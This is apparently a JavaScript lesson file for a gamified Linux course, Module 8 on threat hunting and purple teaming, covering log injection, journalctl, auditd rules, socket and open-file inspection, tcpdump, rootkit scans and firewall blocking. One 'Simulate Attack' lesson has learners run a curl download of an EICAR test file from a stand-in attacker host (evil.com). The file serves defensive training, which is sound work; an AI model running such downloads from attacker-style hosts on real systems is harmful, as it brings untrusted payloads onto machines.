// eighthmodule.js
// Module 8: Threat Hunting & Purple Team (65 Lessons)

const module8_purpleteam = {
    name: "8. Threat Hunting & Purple Team (65 Lessons)",
    lessons: [
        // --- PHASE 1: LOG INJECTION & SYSTEMD FORENSICS (1-15) ---
        { title: "Inject Test Log", why: "Purple teams inject logs to test if the SIEM alerts the Blue Team.", text: "Type <code>logger \"Purple Team Test\"</code>", objective: "Type logger \"Purple Team Test\"", xp: 15, check: (c,a) => c==="logger" && a.includes("Purple Team Test") },
        { title: "Verify Injection", why: "Check if the kernel logged your test.", text: "Type <code>tail -n 2 /var/log/syslog</code>", objective: "tail -n 2 /var/log/syslog", xp: 15, check: (c,a) => c==="tail" && a.includes("-n") && a.includes("2") && a.includes("/var/log/syslog") },
        { title: "Tag Log Entry", why: "Inject a log with a specific service tag (-t) to simulate an app crash.", text: "Type <code>logger -t NGINX \"Simulated Crash\"</code>", objective: "Use logger -t NGINX", xp: 20, check: (c,a) => c==="logger" && a.includes("-t") && a.includes("NGINX") },
        { title: "Grep Tagged Log", why: "Ensure the tag was captured.", text: "Type <code>grep \"NGINX\" /var/log/syslog</code>", objective: "Grep NGINX from syslog", xp: 15, check: (c,a) => c==="grep" && a.includes("NGINX") && a.includes("/var/log/syslog") },
        { title: "Journalctl Basics", why: "Query the modern Systemd journal for active logs.", text: "Type <code>journalctl</code>", objective: "Type journalctl", xp: 15, check: (c) => c==="journalctl" },
        { title: "Journalctl Reverse", why: "Read the system journal in reverse (newest first).", text: "Type <code>journalctl -r</code>", objective: "Type journalctl -r", xp: 20, check: (c,a) => c==="journalctl" && a.includes("-r") },
        { title: "Journalctl Follow", why: "Live-tail the system journal for active events.", text: "Type <code>journalctl -f</code>", objective: "Type journalctl -f", xp: 20, check: (c,a) => c==="journalctl" && a.includes("-f") },
        { title: "Journalctl Kernel", why: "Filter only core kernel ring buffer messages.", text: "Type <code>journalctl -k</code>", objective: "Type journalctl -k", xp: 20, check: (c,a) => c==="journalctl" && a.includes("-k") },
        { title: "Journalctl Unit", why: "Filter logs for a specific service daemon.", text: "Type <code>journalctl -u ssh</code>", objective: "Type journalctl -u ssh", xp: 25, check: (c,a) => c==="journalctl" && a.includes("-u") && a.includes("ssh") },
        { title: "Journalctl Priority", why: "Filter only critical errors (Priority 0-3).", text: "Type <code>journalctl -p err</code>", objective: "Type journalctl -p err", xp: 25, check: (c,a) => c==="journalctl" && a.includes("-p") && a.includes("err") },
        { title: "Journalctl Time Since", why: "Filter logs from the last 10 minutes.", text: "Type <code>journalctl --since \"10 min ago\"</code>", objective: "Use journalctl --since", xp: 30, check: (c,a) => c==="journalctl" && a.includes("--since") },
        { title: "Journalctl Time Until", why: "Filter logs ending 1 hour ago.", text: "Type <code>journalctl --until \"1 hour ago\"</code>", objective: "Use journalctl --until", xp: 30, check: (c,a) => c==="journalctl" && a.includes("--until") },
        { title: "Journalctl Lines", why: "Limit the output exactly like 'tail -n'.", text: "Type <code>journalctl -n 10</code>", objective: "Use journalctl -n 10", xp: 20, check: (c,a) => c==="journalctl" && a.includes("-n") && a.includes("10") },
        { title: "Journalctl Disk Space", why: "Check how much disk space the logs are consuming.", text: "Type <code>journalctl --disk-usage</code>", objective: "Use journalctl --disk-usage", xp: 20, check: (c,a) => c==="journalctl" && a.includes("--disk-usage") },
        { title: "Log System State", why: "Save the current journal kernel errors to a file.", text: "Type <code>journalctl -k -p err > kernel_errors.txt</code>", objective: "Redirect to kernel_errors.txt", xp: 30, check: (c,a) => c==="journalctl" && a.includes("-k") && a.includes(">") && a.includes("kernel_errors.txt") },

        // --- PHASE 2: KERNEL AUDITING (16-25) ---
        { title: "Check Audit Status", why: "Check if the Linux Auditing System is running.", text: "Type <code>auditctl -s</code>", objective: "Type auditctl -s", xp: 20, check: (c,a) => c==="auditctl" && a.includes("-s") },
        { title: "List Audit Rules", why: "View currently active kernel tracking rules.", text: "Type <code>auditctl -l</code>", objective: "Type auditctl -l", xp: 20, check: (c,a) => c==="auditctl" && a.includes("-l") },
        { title: "Watch File Execution", why: "Create a rule to track who executes the 'ping' binary.", text: "Type <code>auditctl -w /usr/bin/ping -p x -k ping_exec</code>", objective: "Watch /usr/bin/ping", xp: 40, check: (c,a) => c==="auditctl" && a.includes("-w") && a.includes("/usr/bin/ping") },
        { title: "Watch File Reads", why: "Create a rule to track who reads the password file.", text: "Type <code>auditctl -w /etc/shadow -p r -k shadow_read</code>", objective: "Watch /etc/shadow", xp: 40, check: (c,a) => c==="auditctl" && a.includes("-w") && a.includes("/etc/shadow") },
        { title: "Verify New Rules", why: "Check that the kernel accepted the watches.", text: "Type <code>auditctl -l</code>", objective: "Type auditctl -l", xp: 15, check: (c,a) => c==="auditctl" && a.includes("-l") },
        { title: "Search Audit Logs", why: "Use ausearch to look for audit events.", text: "Type <code>ausearch -m PATH</code>", objective: "Type ausearch -m PATH", xp: 30, check: (c,a) => c==="ausearch" && a.includes("-m") && a.includes("PATH") },
        { title: "Search by Key", why: "Find events tagged with our shadow_read rule.", text: "Type <code>ausearch -k shadow_read</code>", objective: "Type ausearch -k shadow_read", xp: 35, check: (c,a) => c==="ausearch" && a.includes("-k") && a.includes("shadow_read") },
        { title: "Search by Executable", why: "Find events caused by the bash shell.", text: "Type <code>ausearch -x bash</code>", objective: "Type ausearch -x bash", xp: 35, check: (c,a) => c==="ausearch" && a.includes("-x") && a.includes("bash") },
        { title: "Audit Report Executables", why: "Generate a summary of all executed files.", text: "Type <code>aureport -x --summary</code>", objective: "Type aureport -x --summary", xp: 35, check: (c,a) => c==="aureport" && a.includes("-x") && a.includes("--summary") },
        { title: "Clear Audit Rules", why: "Flush the kernel rules to clean up.", text: "Type <code>auditctl -D</code>", objective: "Type auditctl -D", xp: 25, check: (c,a) => c==="auditctl" && a.includes("-D") },

        // --- PHASE 3: ADVANCED SOCKETS & FILE DESCRIPTORS (26-40) ---
        { title: "Modern Sockets", why: "The 'ss' command is the modern, faster replacement for netstat.", text: "Type <code>ss -tuln</code>", objective: "Type ss -tuln", xp: 20, check: (c,a) => c==="ss" && a.includes("-tuln") },
        { title: "Socket Processes", why: "Show which process owns the listening socket.", text: "Type <code>ss -tulnp</code>", objective: "Type ss -tulnp", xp: 25, check: (c,a) => c==="ss" && a.includes("-tulnp") },
        { title: "Socket Summary", why: "Get a quick count of all sockets by protocol.", text: "Type <code>ss -s</code>", objective: "Type ss -s", xp: 20, check: (c,a) => c==="ss" && a.includes("-s") },
        { title: "Filter Sockets by Port", why: "Only show sockets on port 22 (SSH).", text: "Type <code>ss -at '( dport = :22 or sport = :22 )'</code>", objective: "Filter ss for port 22", xp: 40, check: (c,a) => c==="ss" && a.includes("22") },
        { title: "List Open Files", why: "In Linux, everything is a file. lsof shows what is open.", text: "Type <code>lsof</code>", objective: "Type lsof", xp: 15, check: (c) => c==="lsof" },
        { title: "LSOF by Port", why: "Find out what is running on port 80.", text: "Type <code>lsof -i :80</code>", objective: "Type lsof -i :80", xp: 30, check: (c,a) => c==="lsof" && a.includes("-i") && a.includes(":80") },
        { title: "LSOF by Protocol", why: "Show all open IPv4 network files.", text: "Type <code>lsof -i 4</code>", objective: "Type lsof -i 4", xp: 30, check: (c,a) => c==="lsof" && a.includes("-i") && a.includes("4") },
        { title: "LSOF by User", why: "Show all files opened by root.", text: "Type <code>lsof -u root</code>", objective: "Type lsof -u root", xp: 30, check: (c,a) => c==="lsof" && a.includes("-u") && a.includes("root") },
        { title: "LSOF by PID", why: "Investigate what files process 1337 is touching.", text: "Type <code>lsof -p 1337</code>", objective: "Type lsof -p 1337", xp: 30, check: (c,a) => c==="lsof" && a.includes("-p") && a.includes("1337") },
        { title: "LSOF Network Connections", why: "Show all established TCP connections.", text: "Type <code>lsof -iTCP -sTCP:ESTABLISHED</code>", objective: "Use lsof to find ESTABLISHED tcp", xp: 40, check: (c,a) => c==="lsof" && a.includes("-iTCP") },
        { title: "Hunt Deleted Executables", why: "Hackers delete their malware, but it stays in memory if running.", text: "Type <code>lsof +L1</code>", objective: "Type lsof +L1", xp: 40, check: (c,a) => c==="lsof" && a.includes("+L1") },
        { title: "Grep LSOF Log", why: "Pipe lsof to find specific interactions.", text: "Type <code>lsof | grep \"/etc/passwd\"</code>", objective: "Grep passwd from lsof", xp: 25, check: (c,a) => c==="lsof" || c==="grep" },
        { title: "Kill Process from LSOF", why: "You found PID 1337 touching critical files. Kill it.", text: "Type <code>kill -9 1337</code>", objective: "Type kill -9 1337", xp: 20, check: (c,a) => c==="kill" && a.includes("-9") && a.includes("1337") },
        { title: "Verify Kill via SS", why: "Ensure the socket is closed.", text: "Type <code>ss -tulnp | grep 1337</code>", objective: "Grep 1337 from ss", xp: 20, check: (c,a) => c==="ss" || c==="grep" },
        { title: "Log Socket State", why: "Save the clean state.", text: "Type <code>ss -tulnp > clean_sockets.txt</code>", objective: "Redirect ss to clean_sockets.txt", xp: 25, check: (c,a) => c==="ss" && a.includes(">") && a.includes("clean_sockets.txt") },

        // --- PHASE 4: PACKET CAPTURE & ROOTKITS (41-55) ---
        { title: "Packet Sniffer", why: "Tcpdump captures network traffic for analysis.", text: "Type <code>tcpdump -c 5</code>", objective: "Capture 5 packets", xp: 20, check: (c,a) => c==="tcpdump" && a.includes("-c") && a.includes("5") },
        { title: "Listen on Interface", why: "Listen specifically on the loopback interface (localhost).", text: "Type <code>tcpdump -i lo -c 5</code>", objective: "Capture on interface 'lo'", xp: 25, check: (c,a) => c==="tcpdump" && a.includes("-i") && a.includes("lo") },
        { title: "Sniff by Port", why: "Capture traffic only on port 80.", text: "Type <code>tcpdump port 80 -c 5</code>", objective: "Capture port 80", xp: 30, check: (c,a) => c==="tcpdump" && a.includes("port") && a.includes("80") },
        { title: "Sniff by IP", why: "Capture traffic to/from a specific host.", text: "Type <code>tcpdump host 10.0.0.99 -c 5</code>", objective: "Capture host 10.0.0.99", xp: 30, check: (c,a) => c==="tcpdump" && a.includes("host") && a.includes("10.0.0.99") },
        { title: "Write PCAP File", why: "Save packet capture to a file for Wireshark analysis.", text: "Type <code>tcpdump -i any -w capture.pcap -c 10</code>", objective: "Write to capture.pcap", xp: 40, check: (c,a) => c==="tcpdump" && a.includes("-w") && a.includes("capture.pcap") },
        { title: "Read PCAP File", why: "Read the packets back out of the saved file.", text: "Type <code>tcpdump -r capture.pcap</code>", objective: "Read capture.pcap", xp: 30, check: (c,a) => c==="tcpdump" && a.includes("-r") && a.includes("capture.pcap") },
        { title: "Rootkit Hunter", why: "Scan the system for known kernel rootkits.", text: "Type <code>chkrootkit</code>", objective: "Type chkrootkit", xp: 20, check: (c) => c==="chkrootkit" },
        { title: "Quiet Rootkit Scan", why: "Only show infected findings.", text: "Type <code>chkrootkit -q</code>", objective: "Type chkrootkit -q", xp: 25, check: (c,a) => c==="chkrootkit" && a.includes("-q") },
        { title: "AppArmor Status", why: "Check if the Linux security module is enforcing profiles.", text: "Type <code>aa-status</code>", objective: "Type aa-status", xp: 20, check: (c) => c==="aa-status" || c==="apparmor_status" },
        { title: "File Permissions Audit", why: "Find world-writable files (massive security risk).", text: "Type <code>find / -perm -2 -type f</code>", objective: "Find world writable files", xp: 40, check: (c,a) => c==="find" && a.includes("-perm") && a.includes("-2") },
        { title: "Check Failed Logins", why: "Another tool to see bad authentication attempts.", text: "Type <code>lastb</code>", objective: "Type lastb", xp: 20, check: (c) => c==="lastb" },
        { title: "Save Audit Report", why: "Compile findings.", text: "Type <code>chkrootkit > audit.txt</code>", objective: "Redirect chkrootkit to audit.txt", xp: 30, check: (c,a) => c==="chkrootkit" && a.includes(">") && a.includes("audit.txt") },
        { title: "Append LSOF", why: "Add open files to the report.", text: "Type <code>lsof -iTCP >> audit.txt</code>", objective: "Append lsof to audit.txt", xp: 30, check: (c,a) => c==="lsof" && a.includes(">>") && a.includes("audit.txt") },
        { title: "Read Audit", why: "Verify report contents.", text: "Type <code>cat audit.txt</code>", objective: "Read audit.txt", xp: 10, check: (c,a) => c==="cat" && a[0]==="audit.txt" },
        { title: "Count Audit", why: "Check report size.", text: "Type <code>wc -l audit.txt</code>", objective: "Count lines in audit.txt", xp: 15, check: (c,a) => c==="wc" && a.includes("-l") && a.includes("audit.txt") },

        // --- PHASE 5: PURPLE TEAM VALIDATION LOOP (56-65) ---
        { title: "Simulate Attack", why: "Red Team: Download an eicar test file to trigger defenses.", text: "Type <code>curl -O http://evil.com/eicar.com</code>", objective: "Download test payload", xp: 30, check: (c,a) => c==="curl" && a.includes("eicar.com") },
        { title: "Verify Attack Log", why: "Blue Team: Check if the Systemd journal caught the curl command.", text: "Type <code>journalctl | grep curl</code>", objective: "Grep curl from journalctl", xp: 35, check: (c,a) => c==="journalctl" || c==="grep" },
        { title: "Isolate IP", why: "Blue Team: Identify the C2 server IP.", text: "Type <code>echo \"Target IP: 10.0.0.99\"</code>", objective: "Identify 10.0.0.99", xp: 15, check: (c,a) => c==="echo" && a.includes("10.0.0.99") },
        { title: "Deploy Countermeasure", why: "Blue Team: Block the IP using iptables.", text: "Type <code>iptables -A OUTPUT -d 10.0.0.99 -j DROP</code>", objective: "Block outbound to 10.0.0.99", xp: 40, check: (c,a) => c==="iptables" && a.includes("-A") && a.includes("10.0.0.99") && a.includes("DROP") },
        { title: "Validate Countermeasure", why: "Red Team: Try to reach the server again to test the block.", text: "Type <code>ping -c 1 10.0.0.99</code>", objective: "Ping the blocked IP", xp: 30, check: (c,a) => c==="ping" && a.includes("10.0.0.99") },
        { title: "Audit Dropped Packets", why: "Blue Team: Watch the firewall drop the packet in real-time.", text: "Type <code>tcpdump host 10.0.0.99 -c 2</code>", objective: "Run tcpdump on 10.0.0.99", xp: 40, check: (c,a) => c==="tcpdump" && a.includes("10.0.0.99") },
        { title: "Delete Payload", why: "Blue Team: Eradicate the test file.", text: "Type <code>rm eicar.com</code>", objective: "rm eicar.com", xp: 15, check: (c,a) => c==="rm" && a[0]==="eicar.com" },
        { title: "Check Network State", why: "Blue Team: Ensure no backdoors spawned during the test.", text: "Type <code>ss -tulnp</code>", objective: "Type ss -tulnp", xp: 20, check: (c,a) => c==="ss" && a.includes("-tulnp") },
        { title: "Report Generation", why: "Purple Team: Log the successful test.", text: "Type <code>echo \"Test Complete: Defense Validated\" > purple.log</code>", objective: "Create purple.log", xp: 20, check: (c,a) => c==="echo" && a.includes(">") && a.includes("purple.log") },
        { title: "Sign-Off", why: "Module 8 Complete.", text: "Type <code>cat purple.log</code>", objective: "Read purple.log", xp: 15, check: (c,a) => c==="cat" && a[0]==="purple.log" }
    ]
};